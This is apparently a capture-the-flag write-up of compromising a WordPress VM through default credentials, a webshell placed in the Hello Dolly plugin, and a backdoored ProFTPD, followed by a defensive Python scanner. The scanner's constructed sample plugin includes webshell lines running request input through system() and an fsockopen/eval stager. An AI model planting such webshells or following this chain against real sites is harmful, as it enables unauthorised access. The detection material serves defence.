* Target IP (192.168.126.142)
* Full Scan
Looks like we have ports 21, 22, and 80. Let's try port 80. Starting with Nikto to find some vulns.
Ok. Let's try to look up some directories. Ah, there's a secret...
Looks like from the page source I should edit my hosts file for DNS resolution.
Ok. Now we look at the WordPress page. Let's try the usual credentials. Welp, that works.
HELLLOOOO Dollllllyyy. With this plugin, we can add a webshell and activate the plugin. Initially I added it at the beginning of the plugin and it did not work well. Then, I added it to the end of the plugin and voilà.
We have a meterpreter session. Let's do some exploring.
Ok. You know the drill. Let's look at some of the config files. Let's look at the HOME directory.
Woah. ProFTPD backdoored? Uh, I know there is a vuln for that.
Got Root? Well, I guess now we just check for flags if there are any. Looks like this server was hacked and a backdoor was entered. I did not check if there was a kernel privilege escalation vulnerability but I suspect there is. I will revisit it later. I did check John the Ripper for the Marlinspike password. It is just marlinspike :)
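From the defender's side, the plugin tampering described above (PHP added to the Hello Dolly plugin file through the WordPress dashboard) is the kind of change a simple source scan can surface. The following is an added example, not part of the original write-up: a small Python heuristic scanner whose rule names, function names and sample plugin text are all constructed for illustration.

```python
import re

# PHP functions that run OS commands or evaluate strings as code.
EXEC_SINKS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Request-controlled PHP superglobals.
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"
# Functions that open sockets; unusual inside a cosmetic plugin.
SOCKET_CALLS = r"\b(?:fsockopen|stream_socket_client|socket_create)"

# Hypothetical rule set: (name, pattern), applied to each source line.
RULES = [
    ("exec-sink-on-request-input",
     re.compile(EXEC_SINKS + r"\s*\([^;]*" + REQUEST_INPUT, re.I)),
    ("backtick-on-request-input",
     re.compile(r"`[^`]*" + REQUEST_INPUT + r"[^`]*`", re.I)),
    ("outbound-socket", re.compile(SOCKET_CALLS + r"\s*\(", re.I)),
    ("eval-of-variable", re.compile(r"\beval\s*\(\s*\$", re.I)),
]

def scan_php(source):
    """Return (line_number, rule_name, stripped_line) for every rule hit."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((number, name, line.strip()))
    return findings

# Constructed sample: a trimmed plugin file with two tampered lines
# appended after the legitimate code.
SAMPLE_PLUGIN = """<?php
/*
Plugin Name: Hello Dolly
*/
function hello_dolly_get_lyric() {
    $lyrics = "Hello, Dolly";
    return wptexturize( $lyrics );
}
add_action( 'admin_notices', 'hello_dolly' );
// --- constructed tampering appended below ---
if (isset($_REQUEST['c'])) { system($_REQUEST['c']); }
$s = fsockopen($host, $port); eval($stage);
"""

if __name__ == "__main__":
    for number, rule, text in scan_php(SAMPLE_PLUGIN):
        print(f"line {number}: {rule}: {text}")
```

Line-based patterns like these miss obfuscated code, so they work best alongside a comparison of plugin files against known-good copies. Setting `DISALLOW_FILE_EDIT` to true in `wp-config.php` removes the dashboard plugin editor.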